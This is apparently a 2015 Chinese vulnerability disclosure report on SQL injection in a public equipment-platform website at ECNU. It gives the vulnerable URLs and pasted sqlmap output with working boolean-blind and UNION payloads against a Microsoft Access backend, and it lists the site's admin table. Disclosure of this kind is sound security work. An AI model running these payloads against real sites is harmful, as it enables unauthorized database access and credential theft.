2015-12-03: 细节已通知厂商并且等待厂商处理中 2015-12-03: 厂商已经确认,细节仅向厂商公开 2015-12-13: 细节向核心白帽子及相关领域专家公开 2015-12-23: 细节向普通白帽子公开 2016-01-02: 细节向实习白帽子公开 2016-01-17: 细节向公众公开
如题
说明:这个是设备处公共平台网站http://ggpt.ecnu.edu.cn/非设备处门户网站0x01 漏洞类型及位置
sql注入
http://ggpt.ecnu.edu.cn/
0x02 漏洞详细第一处
http://ggpt.ecnu.edu.cn/news1.asp?id=1726&typetitle=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81
第二处
第三处
0x03 漏洞测试sqlmap
0x04测试结果
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1726 AND 7554=7554&typetitle=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81 Type: UNION query Title: Generic UNION query (NULL) - 13 columns Payload: id=-8162 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(99)&CHR(121)&CHR(98)&CHR(113)&CHR(73)&CHR(75)&CHR(68)&CHR(105)&CHR(65)&CHR(69)&CHR(87)&CHR(85)&CHR(71)&CHR(113)&CHR(113)&CHR(121)&CHR(108)&CHR(97)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&typetitle=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81---[11:46:41] [INFO] the back-end DBMS is Microsoft Accessweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft Access
sqlmap identified the following injection points with a total of 28 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1623 AND 3035=3035&title=%E5%82%85%E9%87%8C%E5%8F%B6%E5%8F%98%E6%8D%A2%E7%BA%A2%E5%A4%96%E5%88%86%E5%85%89%E5%85%89%E5%BA%A6%E8%AE%A1&typetitle= Type: UNION query Title: Generic UNION query (NULL) - 13 columns Payload: id=-9050 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(105)&CHR(107)&CHR(121)&CHR(113)&CHR(108)&CHR(118)&CHR(115)&CHR(70)&CHR(120)&CHR(99)&CHR(114)&CHR(105)&CHR(66)&CHR(105)&CHR(113)&CHR(101)&CHR(103)&CHR(100)&CHR(113),NULL,NULL,NULL FROM MSysAccessObjects%16&title=%E5%82%85%E9%87%8C%E5%8F%B6%E5%8F%98%E6%8D%A2%E7%BA%A2%E5%A4%96%E5%88%86%E5%85%89%E5%85%89%E5%BA%A6%E8%AE%A1&typetitle=---[12:04:00] [INFO] testing Microsoft Access[12:04:01] [INFO] confirming Microsoft Access[12:04:01] [INFO] the back-end DBMS is Microsoft Accessweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft Access
---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1571 AND 1374=1374&title=%E5%BE%AE%E6%B3%A2%E5%B0%84%E9%A2%91%E6%B5%8B%E8%AF%95%E5%AE%9E%E9%AA%8C%E5%AE%A4&typetitle= Type: UNION query Title: Generic UNION query (NULL) - 13 columns Payload: id=-1512 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(100)&CHR(121)&CHR(105)&CHR(113)&CHR(77)&CHR(118)&CHR(115)&CHR(86)&CHR(118)&CHR(69)&CHR(73)&CHR(112)&CHR(98)&CHR(99)&CHR(113)&CHR(114)&CHR(110)&CHR(114)&CHR(113),NULL,NULL FROM MSysAccessObjects%16&title=%E5%BE%AE%E6%B3%A2%E5%B0%84%E9%A2%91%E6%B5%8B%E8%AF%95%E5%AE%9E%E9%AA%8C%E5%AE%A4&typetitle=---[12:05:04] [INFO] testing Microsoft Access[12:05:04] [INFO] confirming Microsoft Access[12:05:05] [INFO] the back-end DBMS is Microsoft Accessweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb[1 table]+----------+| tb_admin |+----------+
过滤过滤
危害等级:高
漏洞Rank:10
确认时间:2015-12-03 14:09
通知二级单位处理。
暂无